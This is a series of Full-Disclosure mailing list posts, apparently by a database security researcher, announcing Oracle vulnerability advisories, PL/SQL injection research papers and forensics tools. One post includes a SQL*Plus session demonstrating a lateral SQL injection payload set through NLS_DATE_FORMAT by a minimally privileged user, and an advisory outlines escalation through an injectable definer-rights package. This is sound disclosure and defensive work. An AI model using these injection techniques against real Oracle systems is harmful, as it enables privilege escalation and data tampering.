[Full-disclosure] Two papers on Oracle 11g Security
Hey all, Since there seems to be a fair bit of disinformation, and utter nonsense, floating around since my talk at the Black Hat Federal security conference the other day, I have decided to publish the following papers. http://www.databasesecurity.com/HackingAurora.pdf http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf Whilst the papers were written on the 14th and 21st of October respectively, Oracle were informed on these issues discussed in these papers on the 11th and 13th of October 2009. The slides from the talk can be found here: http://www.databasesecurity.com/bh-DC2010.pdf Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle 11g (11.1.0.6) Password Policy and Compliance
Many security standards require the tracking of users' password history to prevent password re-use. In Oracle 11g (11.1.0.6), if a security administrator has enabled 11g passwords exclusively then tracking password history is broken. This can affect compliance. This was addressed by Oracle in their April 2009 Critical Patch Update and maps to the currently unspecified vulnerability at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0988 Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle PL/SQL Injection Flaw in REPCAT_RPC.VALIDATE_REMOTE_RC
Hey all, The Oracle REPCAT_RPC.VALIDATE_REMOTE_RC function executes blocks of anonymous PL/SQL that can be influenced by an attacker to execute arbitrary PL/SQL. As this package is only accessible directly by SYS this flaw would not normally present a risk. However, the REPCAT_RPC.VALIDATE_REMOTE_RC function can be used as an auxiliary inject function to escalate privileges. This is described in a paper I wrote in February 2007 after reporting the issue but am only releasing now as the flaw has fixed by Oracle in their July 2009 Critical Patch Update. This flaw documents the currently unspecified flaw at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1021 The paper is available from http://www.databasesecurity.com/oracle/plsql-injection-create-session.pdf Please note that many of the techniques discussed in this paper have been superceded by cursor injection (http://www.databasesecurity.com/dbsec/cursor-injection.pdf) which was written 3 days after. Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Bypassing DBMS_ASSERT in certain situations
DBMS_ASSERT can be used to prevent PL/SQL injection. In certain cases it can be bypassed. This is documented in a paper I wrote in July 2008 but am only publishing now: http://www.databasesecurity.com/oracle/Bypassing-DBMS_ASSERT.pdf Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
NGSSoftware Insight Security Research Advisory Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2) Severity: High Vendor URL: http://www.oracle.com/ Author: David Litchfield [ dav...@ngssoftware.com ] Reported: 23rd July 2008 Date of Public Advisory: 13th January 2009 Advisory number: #NISR13012009 CVE: CVE-2008-3979 Overview Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user. Details *** MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required. Fix Information *** Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp About NGSSoftware * NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: Manchester Technology Centre, Oxford Road, Manchester, M1 7EF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New tool and paper for Oracle forensics...
Hey all, I've just posted a new tool and paper for Oracle forensics. The tool, orablock, allows a forensic investigator to dump data from a "cold" Oracle data file - i.e. there's no need to load up the data file in the database which would cause the data file to be modified, so using orablock preserves the evidence. Orablock can also be used to locate "stale" data - i.e. data that has been deleted or updated. It can also be used to dump SCNs for data blocks which can be useful during the examination of a compromised Oracle box. Indeed, this is the subject of the paper "Oracle Forensics Part 7: Using the Oracle System Change Number in Forensic Examinations". Both the tool (which compiles on Linux, Mac OS X and Windows) and the paper are available from http://www.databasesecurity.com/. Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Deep Blind SQL Injection Whitepaper
Hi Ferruh, > This is a short whitepaper about a new way to exploit Blind SQL > Injections. I just had a read of your paper. You open with: "If the injection point is completely blind then the only way to extract data is using time based attacks like WAITFOR DELAY, BENCHMARK etc." This is not the case. You can use other non-time based (and therefore faster) methods to infer the value of data. See "Data-mining with SQL Injection and Inference" - http://www.ngssoftware.com/papers/sqlinference.pdf Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pwnie Awards 2008
Hey Alexandr, I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd be more than happy to - after all one bug over 3 years means someone did a really good job ;) Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Lateral SQL Injection Revisited - No Special Privs Required
At the end of April 2008 I published a paper about a new class of flaw in Oracle entitled "Lateral SQL Injection". The paper can be found here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf Essentially the paper details a way in which the attacker can manipulate the environment to trick an Oracle database into using arbitrary SQL in DATE functions and data. A number of people at the time dismissed it as irrelevant because the attacker required the ALTER SESSIOn privilege. Well, as it turns out, you don't need the ALTER SESSION privilege at all. Here's why: there are certain ALTER SESSION statements that can be executed even though the user doesn't have the ALTER SESSION privilege. The statements that can be executed without the privilege include those that relate to National Language Support. Thus a user without ALTER SESSION privileges can change the date format and so employ a lateral SQL injection attack. The script below shows this in action. We connect to a fully patched 11g server and confirm we only have CREATE SESSION privileges - i.e. the minimum we need to connect to the server - everyone gets this privilege. We then issue an ALTER SESSION statement to try set SQL_TRACE to true. As expected this fails with an insufficient privileges error. But then we issues an ALTER SESSION to set the NLS_DATE_FORMAT and this succeeds. Lastly we call the SYSDATE function to confirm it took. C:\>sqlplus /nolog SQL*Plus: Release 11.1.0.6.0 - Production on Fri Jul 18 14:47:17 2008 Copyright (c) 1982, 2007, Oracle. All rights reserved. SQL> connect testuser1/testuser1 Connected. SQL> select * from session_privs; PRIVILEGE CREATE SESSION SQL> alter session set sql_trace = true; alter session set sql_trace = true * ERROR at line 1: ORA-01031: insufficient privileges SQL> alter session set nls_date_format='"'' and myfunc()=1--"'; Session altered. SQL> select sysdate from dual; SYSDATE -- ' and myfunc()=1-- SQL> Thus we can see that no special privileges are required to effect a lateral SQL injection attack. I suppose I should have spotted this at the time. Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Application Server PLSQL injection flaw
NGSSoftware Insight Security Research Advisory Name: PLSQL Injection in Oracle Application Server Systems Affected: Oracle Application Server 9.0.4.3, 10.1.2.2, 10.1.4.1 Severity: Critical Vendor URL: http://www.oracle.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Reported: 9th October 2007 Date of Public Advisory: 15th July 2008 Advisory number: #NISR15072008 CVE: CVE-2008-2589 Overview Oracle has just released a fix for a flaw that, when exploited, allows an unauthenticated attacker on the Internet to gain full control of a backend Oracle database server via the front end web server. Details *** Oracle Application Server installs a number of PLSQL packages in the backend database server. One of these is the WWV_RENDER_REPORT package and it is vulnerable to PLSQL injection. This package uses definer rights execution and therefore executes with the privileges of the owner, in this case the highly privileged PORTAL user. Specifically, the SHOW procedure takes as its 2nd argument the name of a function to execute and this is embedded with a dynamically executed anonymous block of PLSQL without first being sanitized. Because it is a block of anonymous PLSQL, an attacker can exploit this flaw to run any SQL statement, for example, create new users, grant dba privileges, delete or modify data. This is achieved by wrapping the statement(s) within an "execute immediate" statement and specifiying the autonomous_transaction pragma. Fix Information *** Oracle was alerted to this flaw on the 9th October 2007. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuj ul2008.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.ph p About NGSSoftware * NGSSoftware develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGSConsulting provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A New Class of Vulnerability in Oracle: Lateral SQL Injection
Hey all, I've just released some research that demonstrates a new class of vulnerability in Oracle and how it can be exploited by an attacker. You can grab the paper from here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ http://www.davidlitchfield.com/blog -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle 11g/10g Installation Vulnerability
Hey all, After investigating 11g the other day I came across an interesting issue. During the installation of Oracle 11g and 10g all accounts, including the SYS and SYSTEM accounts, have their default passwords and only at the end of the install are the passwords changed. This means that there is a window of opportunity for an attacker to log into the database server during the install process. Depending upon "which" install options you choose determines the size of the window. Full details for those that are interested can be found here: http://www.davidlitchfield.com/blog/archives/0030.htm - since I reported this to Oracle on the 3rd of November they've updated their security checklist document: http://www.oracle.com/technology/deploy/security/pdf/twp_security_checklist_ db_database_20071108.pdf Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SQL Injection Flaw in Oracle Workspace Manager
(resend with title...) NGSSoftware Insight Security Research Advisory Name: SQL Injection Flaw in Oracle Workspace Manager Systems Affected: Oracle 10g release 1 and 2, Oracle 9i Severity: High Vendor URL: http://www.oracle.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Reported: 22nd August 2006 Date of Public Advisory: 17th October 2007 Advisory number: #NISR17102007B Description *** The Workspace Manager in Oracle 10g release 1 and 2 and Oracle 9i is vulnerable to SQL injection. Details *** The Workspace Manager, owned by SYS, contains a package called LT. This package is owned and defined by the SYS user and can be executed by PUBLIC. LT contains a procedure called FINDRICSET which calls the FINDRICSET package in the LTRIC package. This is vulnerable to SQL injection and can be abused by an attacker to gain SYS privileges. Fix Information *** Oracle was alerted to this flaw on the 22nd of August 2006. A patch has now been made available: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuo ct2007.html NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to this flaw. More information about NGSSQuirreL for Oracle can be found here: http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.ph p About NGSSoftware * NGSSoftware develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGSConsulting provide services to some of the largest and most demanding organizations around the globe. http://www.ngssoftware.com/ Telephone +44 208 401 0070 Fax +44 208 401 0076 [EMAIL PROTECTED] -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Another Oracle Forensics Paper...
Hey all, For anyone that's interested I've just posted another paper entitled "Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin". You can get this and other papers on Oracle forensics from http://www.databasesecurity.com/oracle-forensics.htm Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] New Oracle Forensics Paper
Hey all, I've just posted a new paper on Oracle Forensics and my Black Hat presentation to http://www.databasesecurity.com/oracle-forensics.htm The new paper is entitled "Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing" and explores some of the ideas I discussed at Blackhat. Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Forensics Part 4: Live Response
Hey all, For anyone that wants a copy, I've just posted the fourth paper in the Oracle Forensics series I'm writing to http://www.databasesecurity.com/. This paper covers what an incident responder should do during a Live Response on a compromised Oracle server. Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Analysis of the Oracle April 2007 Critical Patch Update
Hey all, I've just posted an analysis of the Oracle April 2007 Critical Patch Update to http://www.ngssoftware.com/research/papers/NGSSoftware-OracleCPUAPR2007.pdf (URL may line wrap) Cheers, David Litchfield -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Three New Papers on Oracle Forensics
Hey all, For anyone that's interested I've just written three papers relating to Oracle forensics. More will follow... Oracle Forensics Part 1: Dissecting the Redo Logs Oracle Forensics Part 2: Locating Dropped Objects Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism You can grab them here: http://www.databasesecurity.com/ Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences
Hey all, I've just put up a paper detailing a new method of exploiting PL/SQL injection flaws in Oracle and potential ways to protect against it. The method entirely removes the requirement for an attacker to create functions to be able to execute arbitrary sql. This should finally put to bed those arguments about whether such and such a PL/SQL injection flaw is exploitable in practice or not by a user with only the CREATE SESSION system privilege. They all are. For anyone going to Blackhat Federal, this'll form part of my talk. For anyone that wants, you can get a copy of the paper from http://www.databasesecurity.com/ - it's called "Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences". Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle - Indirect Privilege Escalation and Defeating Virtual Private Databases
Hey all, For anyone that's interested I've just put out two papers (chapters really); one on Indirect Privilege Escalation in Oracle and the other on Defeating Virtual Private Databases in Oracle. You can grab them here. http://www.databasesecurity.com/dbsec/ohh-indirect-privilege-escalation.pdf http://www.databasesecurity.com/dbsec/ohh-defeating-vpd.pdf Cheers, David -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cursor snarfing - a new class of vulnerability and attack in Oracle
Hey all, I've just written a paper detailing a fairly common PL/SQL programming error related to cursors that leads to a new class of vulnerability in Oracle. You can get a copy of the paper from http://www.databasesecurity.com/ . Cheers, David Litchfield NGSSoftware Ltd +44(0) 208 401 0070 http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update
